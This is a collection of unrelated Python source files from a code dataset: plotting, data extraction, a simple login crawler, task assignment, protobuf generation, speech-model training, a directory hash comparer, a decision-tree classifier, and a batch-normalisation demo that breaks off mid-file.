+{"seq_id":"302319963","text":"import argparse\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom ridge_map import RidgeMap\n\nfrom heightmap import get_image_dims, read_image\n\n\nHEIGHTMAP_FILE = \"heightmaps/los_santos.png\" # input file\nOUTPUT_FILE = \"output/los_santos_desktop.png\" # output file\n\nNUM_LINES = 80 # ideal number of lines to include in ridge map\nX_RESOLUTION = 2 # \"resolution\" in x direction (i.e. for resolution 2, 1 in 2 data points are included)\n\n# (Y_DIM, X_DIM) = get_image_dims(HEIGHTMAP_FILE) # use dims from original file\n(Y_DIM, X_DIM) = (824, 824) # custom dims\n\nDPI = 96 # DPI of my monitor, use link to find out: https://www.infobyip.com/detectmonitordpi.php\nSCALING_FACTOR = 1 # Factor to scale output image by\n\nfig, ax = plt.subplots(figsize=(X_DIM/DPI, Y_DIM/DPI), dpi=DPI)\n\nrm = RidgeMap()\n\nvalues = read_image(HEIGHTMAP_FILE, NUM_LINES, X_RESOLUTION)\n\nvalues = rm.preprocess(values=values,\n water_ntile=40,\n lake_flatness=2,\n vertical_ratio=40)\n\nrm.plot_map(values=values,\n label='',\n label_y=0.2,\n label_x=0.2,\n label_size=20,\n linewidth=2,\n line_color=plt.get_cmap('cool'),\n kind='gradient',\n background_color=np.array([65, 74, 76])/255,\n ax=ax)\n\n# Remove margins around image\n# Solution found from discussions here: https://stackoverflow.com/questions/11837979/removing-white-space-around-a-saved-image-in-matplotlib\nplt.subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\nplt.margins(0, 0)\n\nplt.savefig(OUTPUT_FILE,\n bbox_inches='tight',\n pad_inches=0,\n dpi=DPI*SCALING_FACTOR)\n\nplt.show()","sub_path":"los_santos.py","file_name":"los_santos.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
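The script imports `read_image` and `get_image_dims` from a local `heightmap` module that is not included here, so the following is only a plausible sketch of those helpers, assuming the heightmap is a grayscale image and that `ridge_map` expects a (lines, samples) elevation array:

import numpy as np
from PIL import Image

def get_image_dims(path):
    # Return (height, width); PIL's size attribute is (width, height).
    with Image.open(path) as img:
        return img.size[1], img.size[0]

def read_image(path, num_lines, x_resolution):
    # Load as grayscale, keep num_lines evenly spaced rows, and thin each
    # row by taking every x_resolution-th sample.
    grid = np.asarray(Image.open(path).convert('L'), dtype=float)
    rows = np.linspace(0, grid.shape[0] - 1, num_lines).astype(int)
    return grid[rows, ::x_resolution]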
+{"seq_id":"47673064","text":"from collections import OrderedDict\n\n\nclass TaggedTableToDataStore:\n\n def __init__(self, row_tag_re, column_tag_re, data_store, spacer=\" \"):\n self.row_tag_re = row_tag_re\n self.column_tag_re = column_tag_re\n self.data_store = data_store\n self.spacer = spacer\n\n def get_name(self):\n return \"Tagged Table to Data Store\"\n\n def process(self, document, context):\n\n rows = self.process_node(document.get_root())\n\n for row in rows:\n context.get_store(self.data_store).add(row)\n return document\n\n def process_node(self, node):\n all_rows = []\n\n for line in node.findall(tag_name_re=self.row_tag_re):\n row = OrderedDict()\n for col in line.findall(tag_name_re=self.column_tag_re):\n if col.get_tags()[0] not in row:\n row[col.get_tags()[0]] = []\n row[col.get_tags()[0]].append(col.get_all_content())\n\n all_rows.append(row)\n\n max_cols = 0\n\n for row in all_rows:\n if len(row) > max_cols:\n max_cols = len(row)\n\n final_rows = []\n\n for row in all_rows:\n final_row = []\n for key, value in row.items():\n final_row.append(self.spacer.join(value))\n for n in range(len(final_row), max_cols):\n final_row.append(None)\n final_rows.append(final_row)\n\n return final_rows\n","sub_path":"kodexa/extractors/extractors.py","file_name":"extractors.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
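The padding step at the end of `process_node` can be exercised without a real document tree: each row joins multi-valued cells with the spacer, then short rows are padded with `None` up to the widest row. A standalone run with hand-built rows:

from collections import OrderedDict

spacer = ' '
all_rows = [
    OrderedDict([('name', ['Ada']), ('qty', ['1', '2'])]),  # two cells under one tag
    OrderedDict([('name', ['Bob'])]),                       # short row, needs padding
]
max_cols = max(len(row) for row in all_rows)

final_rows = []
for row in all_rows:
    final_row = [spacer.join(value) for value in row.values()]
    final_row.extend([None] * (max_cols - len(final_row)))  # pad to the widest row
    final_rows.append(final_row)

print(final_rows)  # [['Ada', '1 2'], ['Bob', None]]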
+{"seq_id":"504247205","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json,requests\nfrom bs4 import BeautifulSoup\n\nclass Crawler:\n url=''\n headers={\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.6821.400 QQBrowser/10.3.3040.400'\n }\n data={}\n target_info={}\n # Initialize with the login URL and form data\n def __init__(self,u,d):\n self.url=u\n self.data=d\n\n # Return a logged-in session object\n def getSession(self):\n s=requests.session()\n s.post(url=self.url, headers=self.headers, data=self.data)\n return s\n\n # Return the result of a GET request\n def getGetResponse(self,s,url):\n info=s.get(url)\n return info\n\n # Return the preliminarily parsed result\n def getHandleInfo(self,res):\n info = BeautifulSoup(res.content, 'html.parser')\n return info\n\n # Return the target info\n def crawlInfo(self,info):\n target_info=info\n if (len(target_info) > 0):\n return json.dumps(target_info, ensure_ascii=False), 201\n else:\n return \"false\"\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
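A usage sketch for the class above; the login URL and form fields are placeholders, not a real endpoint:

# Hypothetical endpoint and credentials -- replace with the real form data.
login_url = 'https://example.com/login'
form_data = {'username': 'user', 'password': 'secret'}

crawler = Crawler(login_url, form_data)
session = crawler.getSession()                               # POSTs the login form
resp = crawler.getGetResponse(session, 'https://example.com/profile')
soup = crawler.getHandleInfo(resp)                           # BeautifulSoup document
print(crawler.crawlInfo(soup.title.get_text()))              # JSON string and 201, or "false"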
+{"seq_id":"388976345","text":"from external import *\nfrom TaskAssignment import *\nfrom display import *\n\nv = Visualization(\"Map.jpg\", 60)\nnum_t = 50\nt = np.concatenate((np.random.rand(num_t,1) * 1078, np.random.rand(num_t,1)*730), axis=1)\nt_list = []\n\nfor i in range(len(t)):\n t_list.append(Trolley(t[i, 0], t[i, 1]))\n\nassign = TaskAssignment(t_list, [])\ngroups = assign.grouping()\n\ngo_match = True\nwhile True:\n t_group = TrolleyGroup(0,0,t_list)\n if v.read_click_flag():\n go_match = False\n t_group.elimanate_trolleys_nearby(v.get_mouse_pos())\n t_list = t_group.get_trolleys()\n\n new_groups = []\n for g in groups:\n g.elimanate_trolleys_nearby(v.get_mouse_pos())\n if len(g.get_trolleys()) != 0:\n new_groups.append(TrolleyGroup(*g.get_position(), g.get_trolleys()))\n else:\n go_match = True\n groups = new_groups\n\n w_list = [Worker(*v.get_mouse_pos()), ]\n assign.update(worker=w_list)\n\n if go_match:\n match = assign.assign_workers_to_groups(groups)\n paths = []\n for i, w in enumerate(w_list):\n order = assign.calculate_picking_order(w, groups[match[i]])\n paths.append(order)\n\n v.update(worker=w_list, trolley=t_list, groups=groups, match=match, paths=paths)\n v.draw()\n k = cv2.waitKey(1)\n if k == ord('q'):\n break\n elif k == ord('g'):\n v.on_off_show(groups=False)\n elif k == ord('a'):\n t = np.concatenate((np.random.rand(3,1) * 1078, np.random.rand(3,1)*730), axis=1)\n for i in range(len(t)):\n t_list.append(Trolley(t[i, 0], t[i, 1]))\n assign.update(trolley=t_list)\n groups = assign.grouping()","sub_path":"one_worker_add_trolleys.py","file_name":"one_worker_add_trolleys.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"400775493","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os, sys\r\nimport string\r\nimport glob\r\n\r\n\r\nwork_dir = os.getcwd();\r\nscript_dir = os.path.dirname(os.path.realpath(__file__))\r\nos.chdir(script_dir)\r\nos.chdir(os.path.join('..'));\r\n\r\nproject_dir = os.getcwd();\r\nproto_dir = os.path.join(script_dir, 'proto_v2');\r\n\r\nproto_file = []\r\nfor item in glob.glob(os.path.join(proto_dir, '*.proto')):\r\n proto_file.append('\"' + item + '\"');\r\n\r\nos.chdir(work_dir);\r\nos.system('python \"{0}\"'.format(os.path.join(project_dir, 'loader-binding', 'cxx', 'gen_protocol.py')))\r\ncpp_out_dir = os.path.join(script_dir, 'cxx');\r\n\r\nproto_src_dir = '{0}/v2'.format(cpp_out_dir)\r\nif not os.path.exists(proto_src_dir):\r\n os.mkdir(proto_src_dir)\r\nparams = ['protoc', '-I', proto_dir, '-o', os.path.join(proto_dir, 'kind.pb'), '--cpp_out={0}'.format(proto_src_dir)]\r\nparams.extend(proto_file)\r\ncmd = ' '.join(params)\r\nprint(cmd)\r\nos.system(cmd)\r\n\r\n","sub_path":"sample/gen_protocol.py","file_name":"gen_protocol.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
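The script quotes each .proto path by hand before joining them into one shell string; a sketch of the same protoc invocation via `subprocess` with an argument list, which sidesteps shell quoting entirely (the `cxx_v2` output directory name here is illustrative, not taken from the script):

import glob
import os
import subprocess

proto_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'proto_v2')
proto_files = glob.glob(os.path.join(proto_dir, '*.proto'))

# Each list element is passed to protoc as-is: no shell, no manual quoting,
# so paths containing spaces need no special handling.
subprocess.run(['protoc', '-I', proto_dir,
                '-o', os.path.join(proto_dir, 'kind.pb'),
                '--cpp_out=' + os.path.join(proto_dir, 'cxx_v2'),
                *proto_files], check=True)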
+{"seq_id":"390200850","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 16:17:38 2018\n\n@author: owen\n\"\"\"\n\n# Given an array of integers, find how many pairs in the array such that \n# their sum is less than or equal to a specific target number. \n\n#class Solution:\n# \"\"\"\n# @param nums: an array of integer\n# @param target: an integer\n# @return: an integer\n# \"\"\"\n# def twoSum5(self, nums, target):\n# # write your code here\n# # sort + two pointers, time O(n log n + n^2)\n# nums.sort()\n# n = len(nums)\n# res = 0\n# for right in range(n - 1, 0, -1):\n# left = right - 1 # from right to left, find the first left that makes left + right <= target\n# while left >=0 and nums[left] + nums[right] > target:\n# left -= 1\n# res += left + 1\n# \n# return res\n\nclass Solution:\n \"\"\"\n @param nums: an array of integer\n @param target: an integer\n @return: an integer\n \"\"\"\n def twoSum5(self, nums, target):\n # write your code here\n # sort + two pointers, time O(nlogn + n)\n nums.sort()\n n = len(nums)\n res = 0\n left, right = 0, n - 1\n while left < right:\n sums = nums[left] + nums[right]\n if sums > target:\n right -= 1\n else: # for each left, find the last right that makes left + right <= target\n res += right - left\n left += 1\n \n return res","sub_path":"Two Sum - Less than or equal to target.py","file_name":"Two Sum - Less than or equal to target.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
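A quick worked check of the counting step: whenever nums[left] + nums[right] <= target, every index in (left, right] pairs with left, hence the `right - left` increment.

# Pairs with sum <= 24 among [2, 7, 11, 15]:
# (2,7) (2,11) (2,15) (7,11) (7,15) -> 5; (11,15) = 26 is excluded.
# Trace: left=0,right=3: 17<=24 -> +3; left=1: 22<=24 -> +2; left=2: 26>24 -> right moves, loop ends.
print(Solution().twoSum5([2, 7, 11, 15], 24))  # 5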
+{"seq_id":"513729088","text":"\"\"\"\nCopyright 2021 Tsinghua University\nApache 2.0.\nAuthor: Zheng Huahuan (zhh20@mails.tsinghua.edu.cn)\n\nThis script uses DistributedDataParallel (DDP) to train model within framework of CAT.\nDiffered from `train_dist.py`, this one supports read configurations from json file\nand is more non-hard-coding style.\n\"\"\"\n\nimport utils\nimport os\nimport argparse\nimport numpy as np\nimport model as model_zoo\nimport dataset as DataSet\nfrom _specaug import SpecAug\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torch.utils.data import DataLoader\n\nimport ctc_crf_base\n\n\ndef main(args):\n if not torch.cuda.is_available():\n utils.highlight_msg(\"CPU only training is unsupported.\")\n return None\n\n os.makedirs(args.dir+'/ckpt', exist_ok=True)\n setattr(args, 'ckptpath', args.dir+'/ckpt')\n if os.listdir(args.ckptpath) != [] and not args.debug and args.resume is None:\n utils.highlight_msg(\n f\"ERROR:\\nCheckpoint path `{args.ckptpath}` is not empty!\\nRefuse to run the experiment, otherwise previous files would be overwritten.\")\n raise AssertionError\n\n ngpus_per_node = torch.cuda.device_count()\n args.world_size = ngpus_per_node * args.world_size\n print(f\"Global number of GPUs: {args.world_size}\")\n mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))\n\n\ndef main_worker(gpu, ngpus_per_node, args):\n args.gpu = gpu\n\n args.rank = args.rank * ngpus_per_node + gpu\n print(f\"Use GPU: local[{args.gpu}] | global[{args.rank}]\")\n\n dist.init_process_group(\n backend=args.dist_backend, init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n\n args.batch_size = args.batch_size // ngpus_per_node\n\n print(\"> Data prepare\")\n if args.h5py:\n data_format = \"hdf5\"\n utils.highlight_msg(\"H5py reading might cause error with Multi-GPUs.\")\n Dataset = DataSet.SpeechDataset\n else:\n data_format = \"pickle\"\n Dataset = DataSet.SpeechDatasetPickle\n\n tr_set = Dataset(\n f\"{args.data}/{data_format}/tr.{data_format}\")\n test_set = Dataset(\n f\"{args.data}/{data_format}/cv.{data_format}\")\n print(\"Data prepared.\")\n\n train_sampler = DistributedSampler(tr_set)\n test_sampler = DistributedSampler(test_set)\n test_sampler.set_epoch(1)\n\n trainloader = DataLoader(\n tr_set, batch_size=args.batch_size, shuffle=(train_sampler is None),\n num_workers=args.workers, pin_memory=True,\n sampler=train_sampler, collate_fn=DataSet.sortedPadCollate())\n\n testloader = DataLoader(\n test_set, batch_size=args.batch_size, shuffle=(test_sampler is None),\n num_workers=args.workers, pin_memory=True,\n sampler=test_sampler, collate_fn=DataSet.sortedPadCollate())\n\n logger = OrderedDict({\n 'log_train': ['epoch,loss,loss_real,net_lr,time'],\n 'log_eval': ['loss_real,time']\n })\n manager = utils.Manager(logger, build_model, args)\n\n # get GPU info\n gpu_info = utils.gather_all_gpu_info(args.gpu)\n\n if args.rank == 0:\n print(\"> Model built.\")\n print(\"Model size:{:.2f}M\".format(\n utils.count_parameters(manager.model)/1e6))\n\n utils.gen_readme(args.dir+'/readme.md',\n model=manager.model, gpu_info=gpu_info)\n\n # init ctc-crf, args.iscrf is set in build_model\n if args.iscrf:\n gpus = torch.IntTensor([args.gpu])\n ctc_crf_base.init_env(f\"{args.data}/den_meta/den_lm.fst\", gpus)\n\n # training\n manager.run(train_sampler, trainloader, testloader, 
args)\n\n if args.iscrf:\n ctc_crf_base.release_env(gpus)\n\n\nclass CAT_Model(nn.Module):\n def __init__(self, NET=None, fn_loss='crf', lamb: float = 0.1, net_kwargs: dict = None, sepcaug: nn.Module = None):\n super().__init__()\n if NET is None:\n return None\n\n self.infer = NET(**net_kwargs)\n self.specaug = sepcaug\n\n if fn_loss == \"ctc\":\n self.loss_fn = utils.CTCLoss()\n elif fn_loss == \"crf\":\n self.loss_fn = utils.CRFLoss(lamb=lamb)\n else:\n raise ValueError(f\"Unknown loss function: {fn_loss}\")\n\n def forward(self, logits, labels, input_lengths, label_lengths):\n labels = labels.cpu()\n input_lengths = input_lengths.cpu()\n label_lengths = label_lengths.cpu()\n\n netout, lens_o = self.infer(logits, input_lengths)\n netout = torch.log_softmax(netout, dim=-1)\n\n loss = self.loss_fn(netout, labels, lens_o.to(\n torch.int32).cpu(), label_lengths)\n\n return loss\n\n\ndef build_model(args, configuration, train=True) -> nn.Module:\n\n netconfigs = configuration['net']\n net_kwargs = netconfigs['kwargs']\n net = getattr(model_zoo, netconfigs['type'])\n\n if not train:\n infer_model = net(**net_kwargs)\n return infer_model\n\n if 'lossfn' not in netconfigs:\n lossfn = 'crf'\n utils.highlight_msg(\n \"Warning: not specified \\'lossfn\\' in configuration.\\nDefaultly set to \\'crf\\'\")\n else:\n lossfn = netconfigs['lossfn']\n\n if 'lamb' not in netconfigs:\n lamb = 0.01\n if lossfn == 'crf':\n utils.highlight_msg(\n \"Warning: not specified \\'lamb\\' in configuration.\\nDefaultly set to 0.01\")\n else:\n lamb = netconfigs['lamb']\n\n if 'specaug' not in netconfigs:\n specaug = None\n if args.rank == 0:\n utils.highlight_msg(\"Disable SpecAug.\")\n else:\n specaug = SpecAug(**netconfigs['specaug'])\n\n setattr(args, 'iscrf', lossfn == 'crf')\n model = CAT_Model(net, lossfn, lamb, net_kwargs, specaug)\n\n torch.cuda.set_device(args.gpu)\n model.cuda(args.gpu)\n model = torch.nn.parallel.DistributedDataParallel(\n model, device_ids=[args.gpu])\n return model\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"recognition argument\")\n\n parser.add_argument('--batch_size', default=256, type=int, metavar='N',\n help='mini-batch size (default: 256), this is the total '\n 'batch size of all GPUs on the current node when '\n 'using Distributed Data Parallel')\n\n parser.add_argument(\"--seed\", type=int, default=0,\n help=\"Manual seed.\")\n\n parser.add_argument(\"--resume\", type=str, default=None,\n help=\"Path to location of checkpoint.\")\n\n parser.add_argument(\"--debug\", action=\"store_true\",\n help=\"Configure to debug settings, would overwrite most of the options.\")\n parser.add_argument(\"--h5py\", action=\"store_true\",\n help=\"Load data with H5py, defaultly use pickle (recommended).\")\n\n parser.add_argument(\"--config\", type=str, default=None, metavar='PATH',\n help=\"Path to configuration file of training procedure.\")\n\n parser.add_argument(\"--data\", type=str, default=None,\n help=\"Location of training/testing data.\")\n parser.add_argument(\"--dir\", type=str, default=None, metavar='PATH',\n help=\"Directory to save the log and model files.\")\n\n parser.add_argument('-p', '--print-freq', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\n\n parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\n parser.add_argument('--rank', default=-1, type=int,\n help='node rank for distributed training')\n parser.add_argument('--dist-url', 
default='tcp://127.0.0.1:13943', type=str,\n help='url used to set up distributed training')\n parser.add_argument('--dist-backend', default='nccl', type=str,\n help='distributed backend')\n parser.add_argument('--world-size', default=-1, type=int,\n help='number of nodes for distributed training')\n parser.add_argument('--gpu', default=None, type=int,\n help='GPU id to use.')\n\n args = parser.parse_args()\n\n SEED = args.seed\n torch.manual_seed(SEED)\n torch.cuda.manual_seed_all(SEED)\n np.random.seed(SEED)\n torch.backends.cudnn.deterministic = True\n\n if args.debug:\n utils.highlight_msg(\"Debugging.\")\n\n main(args)\n","sub_path":"scripts/ctc-crf/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
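`utils.CTCLoss` and `utils.CRFLoss` live in the project's `utils` module, which is not shown here; the following is only a plausible minimal sketch of the CTC branch, assuming the network emits (N, T, C) log-probabilities while torch.nn.CTCLoss expects (T, N, C):

import torch
import torch.nn as nn

class CTCLoss(nn.Module):
    # Assumed shape of the project's utils.CTCLoss: a thin wrapper around
    # torch.nn.CTCLoss that transposes batch-first network output.
    def __init__(self, blank=0):
        super().__init__()
        self.ctc = nn.CTCLoss(blank=blank, reduction='mean', zero_infinity=True)

    def forward(self, log_probs, labels, input_lengths, label_lengths):
        # (N, T, C) -> (T, N, C) as required by torch.nn.CTCLoss.
        return self.ctc(log_probs.transpose(0, 1), labels,
                        input_lengths, label_lengths)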
+{"seq_id":"267652629","text":"#! /usr/bin/python\r\n# encoding=UTF-8\r\n# version 3.x\r\n\r\n\"\"\"Back up a directory's info, or compare a directory's changes against a backup\"\"\"\r\n\r\nimport os, datetime, time, hashlib, re\r\nimport optparse\r\nfrom string import Template\r\n\r\n\r\ndef file_md5(file_path):\r\n md5 = None\r\n if os.path.isfile(file_path):\r\n f = open(file_path, 'rb')\r\n md5_obj = hashlib.md5()\r\n md5_obj.update(f.read())\r\n hash_code = md5_obj.hexdigest()\r\n f.close()\r\n md5 = str(hash_code).lower()\r\n return md5\r\n\r\n\r\ndef time_str(t):\r\n tt = datetime.datetime.fromtimestamp(t)\r\n return tt.strftime('%Y%m%d%H%M%S')\r\n\r\n\r\ndef file_info(f, path):\r\n \"\"\"Get info for one file\"\"\"\r\n path_len = len(path)\r\n info = Template(\"\"\"{'name':'${name}','dir':${dir},'md5':'${md5}'}\"\"\")\r\n name = re.sub('\\\\\\\\', '/', f[path_len:])\r\n # ctime = time_str(os.path.getctime(f))\r\n # mtime = time_str(os.path.getmtime(f))\r\n # atime = time(os.path.getatime(f))\r\n isdir = os.path.isdir(f)\r\n md5 = file_md5(f)\r\n return re.sub('\\s+', '', info.substitute(name=name, dir=isdir, md5=md5))\r\n\r\n\r\ndef dir_info(path):\r\n \"\"\"Get info for every file under the given directory\"\"\"\r\n da = []\r\n for root, dirs, files in os.walk(path):\r\n for dir in dirs:\r\n d = os.path.join(root, dir)\r\n da.append(file_info(d, path))\r\n for f in files:\r\n f = os.path.join(root, f)\r\n da.append(file_info(f, path))\r\n return da\r\n\r\n\r\ndef load_file_content(file):\r\n \"\"\"Return the file contents as a string\"\"\"\r\n with open(file, 'r') as ff:\r\n return ff.read()\r\n\r\n\r\ndef usage():\r\n \"\"\"Command-line help\"\"\"\r\n print(\"\"\"\r\n hash3compare.py \r\n usage:\r\n hash3compare.py -b -d dir back up the info of directory dir\r\n hash3compare.py -c -f hash.txt -p dir compare changes in dir against the backup info in hash.txt\r\n hash3compare.py -c -s dir1 -p dir2 compare changes in dir2 using dir1 as the baseline\r\n params:\r\n -b back dir back up the directory info\r\n -d dir the directory to back up\r\n -c compare compare the changes\r\n -f hash file compare against a saved hash file\r\n -s resource path the baseline directory of the comparison\r\n -p compare path the directory to compare \r\n \"\"\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = optparse.OptionParser()\r\n parser.add_option('-b', '--back', action=\"store_true\", default=False, dest=\"back\", help=\"back path info\")\r\n parser.add_option('-c', '--compare', action=\"store_true\", default=False, dest=\"compare\", help=\"compare path modify\")\r\n parser.add_option('-f', '--file', action=\"store\", dest=\"file\", help=\"compare modify with hash.txt\")\r\n parser.add_option('-s', '--source', action=\"store\", dest=\"source\", help=\"compare modify with this path\")\r\n parser.add_option('-p', '--path', action=\"store\", dest=\"path\", help='back or compare path')\r\n\r\n (options, args) = parser.parse_args()\r\n\r\n # print(options)\r\n if options.back and options.compare:\r\n usage()\r\n exit()\r\n elif options.back:\r\n if options.path and os.path.exists(os.path.abspath(options.path)):\r\n path = os.path.abspath(options.path)\r\n print(\"bak -> \" + path)\r\n dir_result = dir_info(path)\r\n cur_time = time.strftime('%Y%m%d%H%M%S', time.localtime())\r\n with open(\"hash_\" + cur_time + \".txt\", 'w') as ff:\r\n ff.write(str(dir_result))\r\n else:\r\n print(\"file not exists:\" + options.path)\r\n\r\n elif options.compare:\r\n if options.file and options.source:\r\n usage()\r\n else:\r\n base_path = os.path.abspath(options.file or options.source)\r\n path = os.path.abspath(options.path)\r\n print(\"\"\"compare modify:\\n\\tleft :%s \\n\\tright: %s\"\"\" % (base_path, path))\r\n dir_result = dir_info(path)\r\n if options.file:\r\n bak_result = eval(load_file_content(options.file))\r\n else:\r\n bak_result = 
dir_info(base_path)\r\n\r\n af, afmd5, bf, bfmd5 = set(), set(), set(), set()\r\n for a in dir_result:\r\n t = eval(a)\r\n af.add(t['name'])\r\n afmd5.add(t['name'] + \":\" + t['md5'])\r\n for b in bak_result:\r\n u = eval(b)\r\n bf.add(u['name'])\r\n bfmd5.add(u['name'] + \":\" + u['md5'])\r\n\r\n add_file_list = af.difference(bf)\r\n if len(add_file_list):\r\n print(\"===add file to right:\")\r\n for f in add_file_list:\r\n print(\"\\t %s\" % f)\r\n\r\n delete_file_list = bf.difference(af)\r\n if len(delete_file_list):\r\n print(\"===delete file form left:\")\r\n for f in delete_file_list:\r\n print(\"\\t %s\" % f)\r\n\r\n modify_file_list = afmd5.difference(bfmd5)\r\n if len(modify_file_list):\r\n print(\"===modify file:\")\r\n for f in modify_file_list:\r\n fn = f.split(':')[0]\r\n if fn not in add_file_list and fn not in delete_file_list:\r\n print(\"\\t\" + f)\r\n\r\n else:\r\n usage()\r\n","sub_path":"src/hash3compare.py","file_name":"hash3compare.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
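`file_md5` above reads each file into memory in one shot; for large trees a chunked digest keeps memory flat while producing the same hash. A drop-in sketch:

import hashlib
import os

def file_md5_chunked(file_path, block_size=1 << 20):
    if not os.path.isfile(file_path):
        return None
    md5_obj = hashlib.md5()
    with open(file_path, 'rb') as f:
        # Feed the digest one 1 MiB block at a time instead of f.read() at once.
        for block in iter(lambda: f.read(block_size), b''):
            md5_obj.update(block)
    return md5_obj.hexdigest().lower()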
+{"seq_id":"195506064","text":"from sklearn import tree\n#from sklearn.metrics import accuracy_score\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndata = pd.read_csv('indians-diabetes.data', header = None, delimiter=' *, *', engine='python')\ndata.columns = ['num_pregent', 'glucose', 'bp', 'triceps', 'serum', 'bmi', 'dpf', 'age', 'class']\n\n#extract features and targets from the data\nfeatures = data.values[:,:8]\ntarget = data.values[:,8]\n\n#Split arrays or matrices into random train and test subsets\nfeatures_train, features_test, target_train, target_test = train_test_split(features, target, test_size = 0.33, random_state = 10)\n\n#Create a Tree Classifier\nclf = tree.DecisionTreeClassifier(min_samples_split=40)\n\n#Fit Tree classifier according to features_train, target_train\nclf.fit(features_train, target_train)\n\n#Perform classification on a single test vector (predict expects a 2D array)\ntarget_pred = clf.predict([[1,89,66,23,94,28.1,0.167,21]])\n\nif target_pred[0] == 1:\n print(\"Diabetes positive\")\nelse:\n print(\"Diabetes negative\")\n\n#Returns the mean accuracy on the given test data and labels.\nprint (clf.score(features_test, target_test)*100)\n\n#print (accuracy_score(target_test, pred))","sub_path":"Diabetes_Predction/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
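The commented-out `accuracy_score` import gives the same number as `clf.score`; appended to the script above, both report the held-out accuracy:

from sklearn.metrics import accuracy_score

pred = clf.predict(features_test)
# score() and accuracy_score agree: the mean fraction of correct labels.
print(clf.score(features_test, target_test) * 100)
print(accuracy_score(target_test, pred) * 100)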
+{"seq_id":"88529778","text":"'''\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport tensorflow.compat.v1 as tf \ntf.compat.v1.disable_eager_execution()\n\nACTIVATION = tf.nn.relu\t\t# relu for every layer\nN_LAYERS = 7\t\t\t\t# 7 hidden layers in total\nN_HIDDEN_UNITS = 30\t\t\t# 30 units per hidden layer\n\n# make runs repeatable\ndef fix_seed(seed=1):\n\t#reproducible\n\tnp.random.seed(seed)\n\ttf.set_random_seed(seed)\n\n\n# plot the histograms\ndef plot_his(inputs, inputs_norm):\n\t#plot histogram for the inputs of every layer\n\tfor j, all_inputs in enumerate([inputs, inputs_norm]):\n\t\tfor i, input in enumerate(all_inputs):\n\t\t\tplt.subplot(2, len(all_inputs), j*len(all_inputs)+(i+1))\n\t\t\tplt.cla()\n\t\t\tif i == 0:\n\t\t\t\tthe_range = (-7,10)\n\t\t\telse:\n\t\t\t\tthe_range = (-1,1)\n\t\t\tplt.hist(input.ravel(), bins=15, range=the_range, color='#FF5733')\n\t\t\tplt.yticks(())\n\t\t\tif j == 1:\n\t\t\t\tplt.xticks(the_range)\n\t\t\telse:\n\t\t\t\tplt.xticks(())\n\t\t\tax = plt.gca()\n\t\t\tax.spines['right'].set_color('none')\n\t\t\tax.spines['top'].set_color('none')\n\t\tplt.title(\"%s normalizing\" % (\"Without\" if j == 0 else \"With\"))\n\tplt.draw()\n\tplt.pause(0.01)\n\n\n# build the network\ndef built_net(xs, ys, norm):\n\tdef add_layer(inputs, in_size, out_size, activation_function=None, norm=False):\n\t\tWeights = tf.Variable(tf.random_normal([in_size, out_size], mean=0., stddev=1.))\n\t\tbiases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n\t\tWx_plus_b = tf.matmul(inputs, Weights) + biases\n\t\t\n\t\tif norm:\n\t\t\tfc_mean, fc_var = tf.nn.moments(Wx_plus_b, axes=[0])\n\t\t\tscale = tf.Variable(tf.ones([out_size]))\n\t\t\tshift = tf.Variable(tf.zeros([out_size]))\n\t\t\tepsilon = 0.001\n\n\t\t\tema = tf.train.ExponentialMovingAverage(decay=0.5)\n\t\t\tdef mean_var_with_update():\n\t\t\t\tema_apply_op = ema.apply([fc_mean, fc_var])\n\t\t\t\twith tf.control_dependencies([ema_apply_op]):\n\t\t\t\t\treturn tf.identity(fc_mean), tf.identity(fc_var)\n\t\t\tmean, var = mean_var_with_update()\n\n\n\t\t\tWx_plus_b = tf.nn.batch_normalization(Wx_plus_b, mean, var, shift, scale, epsilon)\n\n\n\n\t\tif activation_function is None:\n\t\t\toutputs = Wx_plus_b\n\t\telse:\n\t\t\toutputs = activation_function(Wx_plus_b)\n\n\t\treturn outputs\n\n\tfix_seed(1)\n\n\tif norm:\n\t\t# BN for the first input\n\t\tfc_mean, fc_var = tf.nn.moments(xs, axes=[0],)\n\t\tscale = 